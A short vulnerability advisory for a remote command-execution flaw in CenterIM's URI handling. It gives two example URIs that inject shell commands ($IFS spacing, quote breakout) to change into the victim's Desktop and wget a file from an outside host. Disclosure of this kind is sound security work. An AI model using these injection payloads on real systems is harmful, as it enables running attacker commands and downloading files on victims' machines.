CenterIM URI Hanlding Remote Arbitrary Command Execution Vulnerability

info
discussion
exploit
solution
references

CenterIM URI Hanlding Remote Arbitrary Command Execution Vulnerability

An attacker can use an instant-message client to carry out attacks.

The following example URIs are available:

If the victim's browser is already open - http://www.example.com)';cd$IFS$HOME/Desktop;wget${IFS}http://www.example2.com;'(

If the victim's browser is not open - http://http://www.example.com/centerim"&cd$IFS$HOME/Desktop;wget${IFS}http://www.example2.com"